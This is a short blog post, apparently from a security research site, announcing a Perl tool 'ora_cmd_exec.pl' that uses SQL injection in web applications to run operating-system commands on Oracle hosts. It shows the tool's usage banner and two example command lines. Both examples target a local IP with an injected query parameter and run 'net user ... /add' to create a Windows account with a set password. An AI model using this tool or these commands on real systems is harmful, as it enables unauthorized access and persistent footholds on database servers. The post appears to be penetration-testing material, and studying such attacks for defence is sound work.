I wrote a small perl script to automate this process. The script ‘ora_cmd_exec.pl’ exploits web based SQL Injections and execute O.S commands on the Oracle host.
./ora_cmd_exec.pl
———————————————————————–
Oracle command execution via web apps
sid-at-NotSoSecure // notsosecure.com
suported versions <=10.2.0.2, all platforms
------------------------------------------------------------------------
Usage:
ora_cmd_exec.pl
EXAMPLE: ./ora_cmd_exec.pl “http://192.168.172.129:81/ora3.php?name=s’ ” “net user notsosecure n0tsos3cur3 /add”
EXAMPLE: ./ora_cmd_exec.pl “http://192.168.172.129:81/ora3.php?id=100 ” “net user notsosecure n0tsos3cur3 /add”
————————————————————————
Comments
Trackback